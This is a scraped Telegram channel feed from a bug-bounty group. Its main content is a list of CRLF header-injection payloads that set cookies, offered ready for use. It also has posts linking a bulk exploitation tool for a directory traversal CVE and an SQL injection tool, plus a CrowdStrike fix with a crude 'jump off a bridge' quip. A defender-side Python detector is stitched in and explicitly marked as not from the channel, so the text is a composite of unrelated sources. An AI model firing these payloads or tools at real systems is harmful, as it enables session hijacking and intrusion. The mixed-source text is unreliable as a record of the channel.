Brut Security – Telegram
Brut Security
14.7K subscribers
911 photos
73 videos
287 files
969 links
Queries: @wtf_brut
🛃WhatsApp: wa.link/brutsecurity
🈴Training: brutsec.com
📨E-mail: info@brutsec.com
Bug Bounty Tip

CRLF Injection Attack Payload List

🔹 /%%0a0aSet-Cookie:crlf
🔹 /%0aSet-Cookie:crlf
🔹 /%0d%0aSet-Cookie:crlf
🔹 /%0dSet-Cookie:crlf
🔹 /%23%0aSet-Cookie:crlf
🔹 /%23%0d%0aSet-Cookie:crlf
🔹 /%23%0dSet-Cookie:crlf
🔹 /%25%30%61Set-Cookie:crlf
🔹 /%25%30aSet-Cookie:crlf
🔹 /%250aSet-Cookie:crlf
🔹 /%25250aSet-Cookie:crlf
🔹 /%2e%2e%2f%0d%0aSet-Cookie:crlf
🔹 /%2f%2e%2e%0d%0aSet-Cookie:crlf
🔹 /%2F..%0d%0aSet-Cookie:crlf
🔹 /%3f%0d%0aSet-Cookie:crlf
🔹 /%3f%0dSet-Cookie:crlf
🔹 /%u000aSet-Cookie:crlf
🔹 /%E5%98%8D%E5%98%8ASet-Cookie:crlf

#bugbounty #cybersecurity #ethicalhacking
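A defender-side check for the payload variants in the list above, added here as an example and not code from the channel: it normalizes a request path through repeated percent-decoding (for the %25-style double and triple encodings), the non-standard %uXXXX form and the UTF-8 variant whose decoded code points U+560D/U+560A carry 0x0D/0x0A as their low byte, then flags anything that would land as a line break in a response header. The sample paths are constructed; function names are the example's own.

```python
import re
from urllib.parse import unquote

# Constructed sample request paths: six mirror variants from the list above,
# the last two are benign controls.
SAMPLE_PATHS = [
    "/%0d%0aSet-Cookie:crlf",              # plain CRLF
    "/%25250aSet-Cookie:crlf",             # triple-encoded LF
    "/%25%30%61Set-Cookie:crlf",           # "%0a" itself percent-encoded
    "/%23%0dSet-Cookie:crlf",              # fragment marker, then bare CR
    "/%u000aSet-Cookie:crlf",              # non-standard %uXXXX escape
    "/%E5%98%8D%E5%98%8ASet-Cookie:crlf",  # U+560D U+560A, low bytes 0x0D 0x0A
    "/products?id=42",
    "/search?q=line%20break",
]

_UNICODE_ESCAPE = re.compile(r"%u([0-9a-fA-F]{4})")

def normalize(path: str, max_rounds: int = 4) -> str:
    """Decode %uXXXX and percent-encoding repeatedly until nothing changes,
    so double- and triple-encoded payloads are inspected in decoded form."""
    for _ in range(max_rounds):
        decoded = _UNICODE_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), path)
        decoded = unquote(decoded)  # malformed %-sequences are left as-is
        if decoded == path:
            break
        path = decoded
    return path

def _is_line_break(ch: str) -> bool:
    # CR/LF themselves, plus any code point whose low byte is 0x0D/0x0A: a
    # header writer that keeps only the low byte turns U+560A into LF.
    # (Also fires on e.g. U+010A; accepted as a detection false positive.)
    return ord(ch) & 0xFF in (0x0A, 0x0D)

def has_header_break(path: str) -> bool:
    """True if the normalized path contains anything that could end a header."""
    return any(_is_line_break(ch) for ch in normalize(path))

def flag_paths(paths):
    """Return the request paths from a log that a CRLF rule should alert on."""
    return [p for p in paths if has_header_break(p)]

def safe_header_value(value: str) -> str:
    """Mitigation side: reject (never silently strip) request-derived data
    before copying it into a response header such as Location or Set-Cookie."""
    if any(ord(ch) < 0x20 or _is_line_break(ch) for ch in value):
        raise ValueError("control character in header value")
    return value
```

Running `flag_paths(SAMPLE_PATHS)` alerts on the six encoded variants and passes the two benign paths; `safe_header_value` is the check to put in front of any header write that includes request data.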
How to fix the Crowdstrike thing:

1. Boot Windows into safe mode
2. Go to C:\Windows\System32\drivers\CrowdStrike
3. Delete C-00000291*.sys
4. Repeat for every host in your enterprise network including remote workers
5. If you're using BitLocker jump off a bridge
👉 InfiSCA: Your Open-Source Vulnerability Scanner
InfiSCA is an open-source software composition analysis (SCA) tool. Think of it as a security guard for your software supply chain.

🔗Download :
https://github.com/Infisical/infisical
📮JScripter - A noob-friendly JavaScript scraper based on #GAU and #hakrawler. Options to scan a single URL or multiple URLs from a list. Uses threads, saves files into a directory, and de-duplicates during saving.

Download-
https://github.com/ifconfig-me/JScripter

#BugBounty #bugbountytips
🚀 Apepe - Mobile application pentesting🚀

🕵️ Apepe is a Python tool developed to help pentesters and red teamers easily get information from the target app. This tool will extract basic information such as the package name, whether the app is signed, and the development language...

🧾 Source - github.com/oppsec/Apepe
Do Sign Up for Top Notch Results 😎
Best App For SQL Injection
Link -
https://github.com/darknethaxor/DH-HackBar
Drop Your Suggestions for Resources
BBRF-Client: The Bug Bounty Reconnaissance Framework (BBRF) can help you coordinate your reconnaissance workflows across multiple devices.

😚 https://github.com/honoki/bbrf-client/
IDOR in Reset Password

When the user resets his password, the application makes an API request to make sure that the username exists. If it exists, it comes back with Personal Identifying Information (PII) in the response [Full name, Email, Phone number].

By:
@Maakthon

#bugbountytips
🚨 CVE-2024-40348 🚨

👉 This is a bulk scanning and exploitation tool for CVE-2024-40348: Bazaar v1.4.3 allows unauthenticated attackers to execute a directory traversal. This vulnerability was discovered by 4rdr.

🔗 Download :
https://github.com/bigb0x/CVE-2024-40348
Advanced SQL Injection Techniques by nav1n0x.pdf
1 MB
Advanced SQL Injection Techniques
🤩Hey everyone, thanks for being part of this awesome community!
🐸If you enjoy my content and want to support me, you can buy me a coffee on Ko-fi: https://ko-fi.com/brutxninja ☕️ !
🚀A Practical Guide to Starting Your Cybersecurity Career in India🚀

✈️Link- https://ko-fi.com/post/A-Practical-Guide-to-Starting-Your-Cybersecurity-C-L4L410XGKI